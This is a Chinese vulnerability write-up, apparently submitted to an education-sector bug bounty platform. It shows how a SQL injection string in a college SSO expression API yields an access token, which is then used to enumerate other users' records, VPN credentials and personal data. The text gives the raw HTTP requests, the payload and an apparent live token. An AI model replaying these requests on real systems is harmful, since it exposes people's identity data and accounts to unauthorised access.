某政法学院token泄露导致敏感数据泄露

提前说已上传edusrc

image.png

访问一个sso登录平台会加载很多前端代码

在其中发现/r/jd?cmd=com.awspaas.user.apps.magicportal_expression的api

并构造数据包

POST /r/jd?cmd=com.awspaas.user.apps.magicportal_expression HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

sid=&script=@ATExecInterface(Interface20231124001,GH:2103019|pageNo:0|pageSize:1)

发现在返回包

image.png

其中返回了

流程名称
entry
owner 账号 / 姓名
当前状态
表单渲染 URI
为后续跨系统读取提供入口

之后测试修改post内容后
sid=&script=@ATExecInterface(Interface20231124001,GH:21404235' OR '1'='1|pageNo:0|pageSize:1)

发包后发现返回一个accesstoken

image.png

带token去访问3个地址

/infoplus/apis/v2/user//processes/doing
/infoplus/apis/v2/process/
/infoplus/apis/v2/process/

第一个地址获得entry

GET /infoplus/apis/v2/user/2103019/processes/doing?access_token=2ca42ac3a7f2c4f97b7a30b548b54a32&start=0&limit=1 HTTP/1.1

返回数据

image.png

entry=1580724

可看见他人研究生处 VPN 及堡垒机申请
GET /infoplus/apis/v2/process/1580724?access_token= HTTP/1.1

可看见他人身份证号,手机号,邮箱

GET /infoplus/apis/v2/process/1580724/data?access_token= HTTP/1.1

image.png

泄露VPN 账号密码

GET /infoplus/apis/v2/process/1584457/data?access_token= HTTP/1.1

image.png

均可遍历

后续发现这个token为高权限读取权限

能读到他人研究生处 VPN 及堡垒机申请

其中包含很多敏感信息

温馨提示:本文内容仅用于合法授权的安全学习与研究交流,严禁用于未授权渗透测试、漏洞利用或任何违法行为。

涉及企业或平台的未公开漏洞信息,请遵循负责任披露原则,勿公开传播可直接复现的敏感细节。

如存在侵权、错误信息或不当内容,请联系站方处理,我们将及时核实并删除。邮箱:admin@baimaojianghu.com。